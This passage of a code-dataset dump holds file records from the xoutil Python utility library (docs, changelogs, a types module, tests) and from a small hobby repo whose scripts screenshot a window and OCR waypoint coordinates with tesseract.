The following invariant was being\n violated::\n\n >>> cut_suffix(v, '') == v # for any value of 'v'\n" }, { "alpha_fraction": 0.47445255517959595, "alphanum_fraction": 0.47445255517959595, "avg_line_length": 26.399999618530273, "blob_id": "9512bf93e2511c5e134166637e683c71d511b59a", "content_id": "e1895c4f74d31a6dd7dc878011a7d456ca8da2bc", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 137, "license_type": "permissive", "max_line_length": 43, "num_lines": 5, "path": "/docs/source/xotl.tools/symbols.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.symbols`:mod: -- Logical values\n===========================================\n\n.. automodule:: xotl.tools.symbols\n :members:\n" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.75, "avg_line_length": 63, "blob_id": "63deb675913c452972760a7053d73e9231d6b2f9", "content_id": "619a4959e6e8fd1018279ee6a293a6262bdf5f76", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 64, "license_type": "permissive", "max_line_length": 63, "num_lines": 1, "path": "/docs/source/history/_changes-2.2.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Drop support for Python 3.5 and commit to support Python 3.8.\n" }, { "alpha_fraction": 0.6174757480621338, "alphanum_fraction": 0.6233009696006775, "avg_line_length": 38.61538314819336, "blob_id": "d058a92e3baf0967ab5e1066bc9d687a6ee1dd9d", "content_id": "b9b1c8a221cbe6c18e20a01a2eaf45219f7d24a0", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 515, "license_type": "permissive", "max_line_length": 101, "num_lines": 13, "path": 
"/docs/source/xotl.tools/string.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.string`:mod: - Common string operations\n===================================================\n\n.. automodule:: xotl.tools.string\n :members: cut_prefix, cut_any_prefix, cut_prefixes, cut_suffix,\n cut_any_suffix, cut_suffixes, error2str, make_a10z\n\n\n.. autofunction:: slugify(value, replacement='-', invalid_chars='', valid_chars='', encoding=None)\n\n.. function:: normalize_slug(value, replacement='-', invalid_chars='', valid_chars='', encoding=None)\n\n Deprecated alias of `slugify`:func:.\n" }, { "alpha_fraction": 0.6902173757553101, "alphanum_fraction": 0.7228260636329651, "avg_line_length": 45, "blob_id": "73f945f7f98e6a17e24d3f13117a060991683c13", "content_id": "1e625ca495f8543ff6ef0dbec6c3337dea7b0614", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 184, "license_type": "permissive", "max_line_length": 78, "num_lines": 4, "path": "/docs/source/history/_changes-2.0.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.4 <rel-1.9.4>`:ref:\\ :\n\n- All changes in `xoutil.validators.identifiers`:mod: are now update to use\n `str.isidentifier`:meth:.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "0c0b9caac182d7b5589c9959f79025b99cd6e623", "content_id": "698b5e322b9d1b9007bbb3f25ea0454fa1b60a83", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": 
"UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.6 <rel-1.9.6>`:ref:\\ :\n" }, { "alpha_fraction": 0.7630922794342041, "alphanum_fraction": 0.7680798172950745, "avg_line_length": 41.21052551269531, "blob_id": "1f6165774782f9326e07ddd7bd037dccf13fb732", "content_id": "de25db25e386ce1be3255e00b45f79f115a753ce", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 802, "license_type": "permissive", "max_line_length": 77, "num_lines": 19, "path": "/docs/source/history/_changes-1.7.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This release was mainly focused in providing a new starting point for several\nother changes. This release is being synchronized with the last release of\nthe 1.6.11 to allow deprecation messages to be included properly.\n\nThe following is the list of changes:\n\n- The `defaults` `xoutil.objects.smart_copy`:func: has being made keyword\n only.\n\n- Deprecates the `~xoutil.collections.StackedDict.pop`:meth: semantics, they\n shadow the `dict.pop`:func:. A new\n `~xoutil.collections.StackedDict.pop_level`:meth: is provided to explicitly\n pop a stack level. 
The same is done for the\n `~xoutil.collections.StackedDict.pop`:meth: method.\n\n- Deprecates function ``xoutil.iterators.fake_dict_iteritems``.\n\n- Deprecates `xoutil.objects.metaclass`:class: in favor for\n `xoutil.eight.meta.metaclass`:func:.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "7ec20e3d118179ac82b72b8c315356f4802d1f2b", "content_id": "fabbb0e99638f86ff3bcdd4190c8a760f9dbf53f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.3 <rel-1.9.3>`:ref:.\n" }, { "alpha_fraction": 0.6365503072738647, "alphanum_fraction": 0.6447638869285583, "avg_line_length": 29.4375, "blob_id": "9dcb8b132ca027b1d23cabb364ab68ef09a9dc65", "content_id": "7215b1a46f55b6a757529f98c977b02c42c82aeb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 487, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/future/threading.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.threading`:mod: - Higher-level threading interface\n=====================================================================\n\n.. module:: xotl.tools.future.threading\n\nThis module extends the standard library's `threading`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. 
autofunction:: async_call\n\n.. autofunction:: sync_call\n" }, { "alpha_fraction": 0.629382312297821, "alphanum_fraction": 0.634390652179718, "avg_line_length": 36.4375, "blob_id": "fbfb7e904421477d0f5069bb52ad458327fc86c5", "content_id": "30fb5769c3842aae52920fdfdc078908717a8e52", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 599, "license_type": "permissive", "max_line_length": 80, "num_lines": 16, "path": "/docs/source/xotl.tools/future/subprocess.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.subprocess`:mod: - Extensions to `subprocess` stardard module\n================================================================================\n\n.. module:: xotl.tools.future.subprocess\n\n.. versionadded:: 1.2.1\n\nThis module contains extensions to the `subprocess`:mod: standard library\nmodule. It may be used as a replacement of the standard.\n\n.. 
function:: call_and_check_output(args, *, stdin=None, shell=False)\n\n This function combines the result of both `call` and `check_output` (from\n the standard library module).\n\n Returns a tuple ``(retcode, output, err_output)``.\n" }, { "alpha_fraction": 0.59329754114151, "alphanum_fraction": 0.5994794368743896, "avg_line_length": 23.200786590576172, "blob_id": "82a2d634adb93575039d564c23ee05080096519a", "content_id": "6f343fdeab0928ab5afed9f58621456b9215cf95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12295, "license_type": "no_license", "max_line_length": 78, "num_lines": 508, "path": "/xotl/tools/future/types.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `types` module.\n\nStandard module defines names for all type symbols known in the standard\ninterpreter.\n\nThis modules mirrors all the functions (and, in general, objects) from the\nstandard library module `types`:mod:; but it also includes several new types\nand type-related functions.\n\nIn Jython and PyPy, `MemberDescriptorType` is identical to\n`GetSetDescriptorType`; to mantain compatibility in some `xotl.tools` code,\nthey are differentiated in this module.\n\n\"\"\"\n\nfrom types import * # noqa\nimport types as _stdlib # noqa\n\nfrom xotl.tools.deprecation import deprecated\n\nfrom xotl.tools.symbols import Unset as _unset\nfrom collections import Mapping\n\n\ntry:\n from types import __all__ # noqa\n\n __all__ = list(__all__)\nexcept ImportError:\n # Python 3.3 don't implement '__all__' for 'string' module.\n __all__ = [name for name in dir(_stdlib) if not name.startswith(\"_\")]\n\ntry:\n 
NoneType = _stdlib.NoneType # noqa\nexcept AttributeError:\n try:\n # In PyPy3 'NoneType' is a built-in\n from builtins import NoneType # noqa\n except ImportError:\n NoneType = type(None)\n __all__.append(\"NoneType\")\n\ntry:\n # It is maintained in this module for perhaps using it in `mypy`.\n EllipsisType # noqa\nexcept NameError:\n EllipsisType = type(Ellipsis)\n __all__.append(\"EllipsisType\")\n\n# Check Jython and PyPy peculiarity\nif MemberDescriptorType is GetSetDescriptorType: # noqa\n\n class _foo:\n __slots__ = \"bar\"\n\n MemberDescriptorType = type(_foo.bar)\n del _foo\n\nFuncTypes = tuple(\n {\n FunctionType,\n MethodType,\n LambdaType, # noqa\n BuiltinFunctionType,\n BuiltinMethodType,\n }\n) # noqa\n\nfunc_types = FuncTypes # Just an alias\n\nfrom types import _calculate_meta # noqa\n\n\nimport re\n\nRegexPattern = type(re.compile(\"\"))\ndel re\n\n\ndef _get_mro_attr(target, name, *default):\n \"\"\"Get a named attribute from a type.\n\n Similar to `getattr` but looking in the MRO dictionaries for the type.\n Used internally in this module.\n\n For example::\n\n >>> class A(SimpleNamespace):\n ... x = 12\n ... y = 34\n\n >>> class B(A):\n ... 
y = 56\n\n >>> b = B(x=1, y=2)\n\n >>> _get_mro_attr(b, 'x')\n 12\n\n >>> _get_mro_attr(b, 'y')\n 56\n\n \"\"\"\n from xotl.tools.future.inspect import _static_getmro\n from xotl.tools.params import check_default, Undefined\n\n # force type\n target = target if isinstance(target, type) else type(target)\n target_mro = _static_getmro(target)\n cls = next((c for c in target_mro if name in c.__dict__), _unset)\n if cls is not _unset:\n return cls.__dict__[name]\n elif check_default()(*default) is not Undefined:\n return default[0]\n else:\n msg = \"'{}' type has no attribute '{}'\"\n raise AttributeError(msg.format(target, name))\n\n\n@deprecated(_get_mro_attr)\nclass mro_dict(Mapping):\n \"\"\"Utility behaving like a read-only dict of `target` MRO attributes.\n\n Used internally in this module.\n\n For example::\n\n >>> class A:\n ... x = 12\n ... y = 34\n\n >>> class B(A):\n ... y = 56\n ... z = 78\n\n >>> d = mro_dict(B)\n\n >>> d['x']\n 12\n\n >>> d['y']\n 56\n\n >>> d['z']\n 78\n\n .. 
deprecated:: 1.8.4\n\n \"\"\"\n\n __slots__ = (\"_probes\", \"_keys\")\n\n def __init__(self, target):\n from xotl.tools.future.inspect import _static_getmro\n\n type_ = target if isinstance(target, type) else type(target)\n target_mro = _static_getmro(type_)\n self._probes = tuple(c.__dict__ for c in target_mro)\n self._keys = set()\n\n def __getitem__(self, name):\n from xotl.tools.objects import get_first_of\n\n result = get_first_of(self._probes, name, default=_unset)\n if result is not _unset:\n return result\n else:\n raise KeyError(name)\n\n def __iter__(self):\n if not self._keys:\n self._settle_keys()\n return iter(self._keys)\n\n def __len__(self):\n if not self._keys:\n self._settle_keys()\n return len(self._keys)\n\n def _settle_keys(self):\n for probe in self._probes:\n for key in probe:\n if key not in self._keys:\n self._keys.add(key)\n\n\n@deprecated(\"None\", '\"mro_get_value_list\" will be removed.')\ndef mro_get_value_list(cls, name):\n \"\"\"Return a list with all `cls` class attributes in MRO.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return list(mro_get_full_mapping(cls, name).values())\n\n\n@deprecated(\"None\", '\"mro_get_full_mapping\" will be removed.')\ndef mro_get_full_mapping(cls, name):\n \"\"\"Return a dictionary with all items from `cls` in MRO.\n\n All values corresponding to `name` must be valid mappings.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.future.inspect import _static_getmro\n\n cls = cls if isinstance(cls, type) else type(cls) # force type\n mro = _static_getmro(cls)\n return {t: t.__dict__[name] for t in mro if name in t.__dict__}\n\n\n@deprecated(\"``iter(maybe)`` in an exception management block.\")\ndef is_iterable(maybe):\n \"\"\"Returns True if `maybe` is an iterable object.\n\n e.g. 
implements the `__iter__` method::\n\n >>> is_iterable('all strings are iterable')\n True\n\n # Numbers are not\n >>> is_iterable(1)\n False\n\n >>> is_iterable(range(1))\n True\n\n >>> is_iterable({})\n True\n\n >>> is_iterable(tuple())\n True\n\n >>> is_iterable(set())\n True\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n try:\n iter(maybe)\n except TypeError:\n return False\n else:\n return True\n\n\n_is_collection_replacement = \"\"\"::\n from xotl.tools.values.simple import collection, nil\n collection(avoid=Mapping)(maybe) is not nil\n\"\"\"\n\n\n@deprecated(_is_collection_replacement)\ndef is_collection(maybe):\n \"\"\"Test `maybe` to see if it is a tuple, a list, a set or a generator\n function.\n\n It returns False for dictionaries and strings::\n\n >>> is_collection('all strings are iterable')\n False\n\n # Numbers are not\n >>> is_collection(1)\n False\n\n >>> is_collection(range(1))\n True\n\n >>> is_collection({})\n False\n\n >>> is_collection(tuple())\n True\n\n >>> is_collection(set())\n True\n\n >>> is_collection(a for a in range(100))\n True\n\n .. versionchanged:: 1.5.5 UserList are collections.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, nil\n\n return logic_collection_coerce(maybe) is not nil\n\n\n@deprecated(\"``isinstance(maybe, Mapping)``\")\ndef is_mapping(maybe):\n \"\"\"Test `maybe` to see if it is a valid mapping.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return isinstance(maybe, Mapping)\n\n\n@deprecated('``maybe + \"\"`` in an exception management block.')\ndef is_string_like(maybe):\n \"\"\"Returns True if `maybe` acts like a string.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n try:\n maybe + \"\"\n except TypeError:\n return False\n else:\n return True\n\n\n@deprecated(\"None\", '\"is_scalar\" will be removed.')\ndef is_scalar(maybe):\n \"\"\"Returns if `maybe` is not not an iterable or a string.\n\n .. 
deprecated:: 1.8.4\n\n \"\"\"\n from collections import Iterable\n\n return isinstance(maybe, str) or not isinstance(maybe, Iterable)\n\n\ndef is_staticmethod(cls, name):\n \"\"\"Returns true if a `method` is a static method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n When a static-method is declared, you can not test that condition using\n the traditional way::\n\n >>> class Foo:\n ... @staticmethod\n ... def bar():\n ... pass\n\n >>> isinstance(Foo.bar, staticmethod)\n False\n\n Using this function::\n\n >>> is_staticmethod(Foo, 'bar')\n True\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, staticmethod)\n\n\ndef is_classmethod(cls, name):\n \"\"\"Returns if a `method` is a class method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n When a class-method is declared, you can not test that condition using the\n traditional way::\n\n >>> class Foo:\n ... @classmethod\n ... def bar(cls):\n ... pass\n\n >>> isinstance(Foo.bar, classmethod)\n False\n\n Using this function::\n\n >>> is_classmethod(Foo, 'bar')\n True\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, classmethod)\n\n\ndef is_instancemethod(cls, name):\n \"\"\"Returns if a `method` is neither a static nor a class method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n To find out if a method is \"normal\", ``isinstance(obj.method,\n MethodType)`` can't be used::\n\n >>> class Foobar:\n ... @classmethod\n ... def cm(cls):\n ... pass\n ... def im(self):\n ... 
pass\n\n >>> isinstance(Foobar.cm, MethodType)\n True\n\n Using this function::\n\n >>> is_instancemethod(Foobar, 'im')\n True\n\n >>> is_instancemethod(Foobar, 'cm')\n False\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, FunctionType) # noqa\n\n\n@deprecated(\"``isinstance(maybe, ModuleType)``\")\ndef is_module(maybe):\n \"\"\"Returns True if `maybe` is a module.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return isinstance(maybe, ModuleType) # noqa\n\n\n@deprecated(\"``all(isinstance(obj, types) for obj in subjects)``\")\ndef are_instances(*args):\n \"\"\"Return True if every `subject` is an instance of (any) `types`.\n\n :param subjects: All but last positional arguments. Are the objects\n required to be instances of `types`.\n\n :param types: The last positional argument. Either a single type or a\n sequence of types. This must meet the conditions on the last\n argument of `isinstance`:func:.\n\n :returns: True or False. True if for every `subject`,\n ``isinstance(subject, types)`` is True. Otherwise, False.\n\n If no `subjects` are provided return True::\n\n >>> are_instances(int)\n True\n\n .. seealso:: The function `no_instances`:func: allows to test for\n subjects not being instances of types.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(args, 1, caller=\"are_instances\")\n *subjects, types = args\n if not subjects:\n isinstance(None, types) # HACK: always validate `types`.\n return all(isinstance(subject, types) for subject in subjects)\n\n\n@deprecated(\"``all(not isinstance(obj, types) for obj in subjects)``\")\ndef no_instances(*args):\n \"\"\"Return True if every `subject` is **not** an instance of (neither)\n `types`.\n\n :param subjects: All but last positional arguments. Are the objects\n required not to be instances of `types`.\n\n :param types: The last positional argument. Either a single type or a\n sequence of types. 
This must meet the conditions on the last\n argument of `isinstance`:func:.\n\n :returns: True or False. True if for every `subject`,\n ``isinstance(subject, types)`` is False. Otherwise, False.\n\n If no `subjects` are provided return True::\n\n >>> no_instances(int)\n True\n\n .. note:: This is not the same as ``not are_instances(...)``.\n\n This function requires that *no* subject is an instance of `types`.\n Negating `are_instances`:func: would be True if *any* subject is\n not an instance of `types`.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(args, 1, caller=\"no_instances\")\n *subjects, types = args\n if not subjects:\n isinstance(None, types) # HACK: always validate `types`.\n return all(not isinstance(subject, types) for subject in subjects)\n" }, { "alpha_fraction": 0.5795195698738098, "alphanum_fraction": 0.5964601635932922, "avg_line_length": 32.80341720581055, "blob_id": "81710bec881a5262f053d00b22ede0406c657ef0", "content_id": "66021aac8af07f5446a54b18087f4e32854577cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3956, "license_type": "no_license", "max_line_length": 78, "num_lines": 117, "path": "/tests/test_params.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nfrom xoutil.values import file_coerce, positive_int_coerce as positive_int\n\n# old params\nfrom xoutil.params import ParamSchemeRow as row, ParamScheme as scheme\n\n\nsample_scheme = scheme(\n row(\"stream\", 0, -1, \"output\", default=sys.stdout, coerce=file_coerce),\n row(\"indent\", 0, 1, default=1, coerce=positive_int),\n row(\"width\", 0, 1, 2, 
\"max_width\", default=79, coerce=positive_int),\n row(\"newline\", default=\"\\n\", coerce=(str,)),\n)\n\ndel file_coerce, positive_int\n\n\ndef test_basic_params():\n def get_values(*args, **kwargs):\n return sample_scheme(args, kwargs, strict=False)\n\n def foobar(**kwargs):\n res = sample_scheme.defaults\n res.update(kwargs)\n return res\n\n one, two = get_values(4, 80), foobar(indent=4, width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(2), foobar(indent=2)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(80, indent=4, extra=\"I'm OK!\")\n two = foobar(width=80, indent=4, extra=\"I'm OK!\")\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(width=80), foobar(width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(sys.stderr, 4, 80)\n two = foobar(indent=4, width=80, stream=sys.stderr)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(4, sys.stderr, newline=\"\\n\\r\")\n two = foobar(indent=4, stream=sys.stderr, newline=\"\\n\\r\")\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(4, output=sys.stderr)\n two = foobar(indent=4, stream=sys.stderr)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(4, max_width=80), foobar(indent=4, width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n\n\ndef test_param_errors():\n def get_values(*args, **kwargs):\n return sample_scheme(args, kwargs)\n\n def error_repr(error):\n return \"{}()\".format(type(error).__name__, error)\n\n msg = 'Must raised \"{}\", \\n\\tnot {}'\n\n try:\n get_values(sys.stderr, 4, output=sys.stderr)\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n try:\n get_values(4, -79)\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except 
BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n try:\n get_values(80, indent=4, extra=\"I'm not OK!\")\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n\n\ndef test_pop_keyword_values():\n from xoutil.symbols import Unset\n from xoutil.params import pop_keyword_values as popkw, Undefined\n\n kwds = dict(default=None, values=[1, 2, 3], collector=sum)\n names = ((\"func\", \"collector\"), \"default\")\n\n assert popkw(dict(kwds), \"values\", *names) == [[1, 2, 3], sum, None]\n\n try:\n assert popkw(dict(kwds), *names) == \"whatever\"\n except TypeError:\n assert True\n\n try:\n assert popkw(dict(kwds), *names, ignore_error=True) == [sum, None]\n except TypeError:\n assert False\n\n test = [Undefined, [1, 2, 3], sum, None]\n assert popkw(dict(kwds), \"x\", \"values\", *names) == test\n\n test = [None, [1, 2, 3], sum, None]\n assert popkw(dict(kwds), \"x\", \"values\", *names, default=None) == test\n\n test = [Unset, [1, 2, 3], sum, None]\n defaults = dict(x=Unset)\n assert popkw(dict(kwds), \"x\", \"values\", *names, defaults=defaults) == test\n" }, { "alpha_fraction": 0.48051947355270386, "alphanum_fraction": 0.48051947355270386, "avg_line_length": 29.799999237060547, "blob_id": "867ce51be6f21fe7b06d5720f4b58ff71a133245", "content_id": "3cc5eb1347ea626e16b28e79114f8fbc000c322b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 154, "license_type": "permissive", "max_line_length": 51, "num_lines": 5, "path": "/docs/source/xotl.tools/progress.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.progress`:mod: - Console progress utils\n===================================================\n\n.. 
automodule:: xotl.tools.progress\n :members:\n" }, { "alpha_fraction": 0.7655172348022461, "alphanum_fraction": 0.7655172348022461, "avg_line_length": 47.33333206176758, "blob_id": "83b24f495350ebe4df8a1a08284011b2580b73ac", "content_id": "d1687172b809a957bc156ffa35fe473acd140f28", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 145, "license_type": "permissive", "max_line_length": 73, "num_lines": 3, "path": "/docs/source/history/_changes-1.7.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the argument `key` to `xoutil.iterators.delete_duplicates`:func:.\n\n- Added the function `xoutil.iterators.iter_delete_duplicates`:func:.\n" } ]
244
l1ving/waypointstominimap
https://github.com/l1ving/waypointstominimap
03d9dc17f8fbd56bed58e8c361c244ed49e634df
80c8065225064166002d3e53fa69b4091233a689
16f44d9b985526234d2e4b0f50b644ad2fb4d87e
refs/heads/master
2022-03-14T06:24:50.317000
2019-10-16T12:32:02
2019-10-16T12:32:02
206,346,026
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7276995182037354, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 22.77777862548828, "blob_id": "00b775352fafd8e76685e836ab1989637ccc4574", "content_id": "1ecd8c548de0dfac5191b49c36754fd8817a68e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 95, "num_lines": 9, "path": "/waypoints/v2/remove-newline.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\nimport fileinput\n\nfor line in fileinput.input(r'/home/usr/Downloads/waypoints/small_file_1.txt', inplace = True):\n\tif not re.search(r'\\n',line):\n\t\tprint(line, end = \"\")" }, { "alpha_fraction": 0.7072165012359619, "alphanum_fraction": 0.7175257802009583, "avg_line_length": 22.095237731933594, "blob_id": "3803c6887fde716aa637b6cca9d8b3d1b39721b7", "content_id": "8d97838b9d1eedea365b629c48e26aea36aeb20d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/tesseract-python/get-screenshot-v3.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot\ndef take_screenshot(widget):\n\tw = Gdk.get_default_root_window()\n\tleft, top = widget.get_position()\n\twidth, height = widget.get_size()\n\tpixbuf = Gdk.pixbuf_get_from_window(w, left, top, width, height)\n\treturn pixbuf\n\tprint(\"Screenshot taken: \" + path)\n" }, { "alpha_fraction": 0.7700650691986084, "alphanum_fraction": 0.7700650691986084, "avg_line_length": 37.41666793823242, "blob_id": 
"da9600e3c90a21a85f8757a843cd57d789159413", "content_id": "108cf5f46c01b3259a5e9d95915a123aa5e990ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 461, "license_type": "no_license", "max_line_length": 150, "num_lines": 12, "path": "/README.md", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "# waypointstominimap\nGets waypoints and converts it to a readable format for minimap mods\n\n## This project is archived as it cannot be maintained\n\n## Usage\n\nThe jar is a program for getting the waypoints.\n\nPlease do *not* even try using this. It's a hacky mess that I made to work. There is some code written by me and some of it is a library (tesseract). \n\nYou can still look at my code and assess the quality and knowledge. Almost every aspect is documented.\n" }, { "alpha_fraction": 0.6390887498855591, "alphanum_fraction": 0.6672661900520325, "avg_line_length": 24.272727966308594, "blob_id": "98cfcf2593604dadbed3a7193446a590510132a5", "content_id": "b37c3b1ab7153214a6ea74f68a4b71ae42391776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1668, "license_type": "no_license", "max_line_length": 140, "num_lines": 66, "path": "/tesseract-python2/run-all.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\nimport sys\nimport keyboard\nimport subprocess\nimport pyautogui\n\t\n# loop this many times\nfor x in range(0, 20):\n\n\t# select window called Go to\n\tbashCommand = \"wmctrl -a \\\"Go to\\\"\"\n\tos.system(bashCommand)\n\t\n\t# wait\n\ttime.sleep(0.08)\n\t\n\t# screenshot active window\n\tscreen = Gdk.get_default_root_window().get_screen()\n\tw = screen.get_active_window()\n\tpb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\n\tpb.savev(\"active.png\", \"png\", (), ())\n\t\n\t# run 
tesseract from bash\n\tbashCommand = \"tesseract active.png stdout >> output1.txt\"\n\tos.system(bashCommand)\n\t\n\t# wait\n\ttime.sleep(1.3)\n\t\n\t# grab window title\n\tcommand = \"xprop -root _NET_ACTIVE_WINDOW\"\n\tfrontmost = subprocess.check_output([\"/bin/bash\", \"-c\", command]).decode(\"utf-8\").strip().split()[-1]\n\t## print(frontmost)\n\t\n\t# correct ID\n\tfixed_id = frontmost[:2]+\"0\"+frontmost[2:]\n\t## print(fixed_id)\n\t\n\t# grab window title\n\tcommand = \"wmctrl -lp\"\n\twindow_pid = [l.split()[2] for l in subprocess.check_output([\"/bin/bash\", \"-c\", command]).decode(\"utf-8\").splitlines() if fixed_id in l][0]\n\t## print(window_pid)\n\t\n\t# debugging to test if it works\n\t## if ( window_pid == \"2375\" ):\n\t\t## print(\"Code will work\")\n\t## else:\n\t\t## print(\"your code is shitty and doesn't work\")\n\t\n\t# actually run function\n\t## if ( window_pid == \"2375\" ):\n\t\t# select window called Go to\n\tbashCommand = \"python3 press-buttons.py >> output4.txt\"\n\tos.system(bashCommand)\n\t\n\t## else:\n\t\t## print(\"you're retarded and this doesn't work\")\n\t\n\t# loop this many times\n\tfor x in range(0, 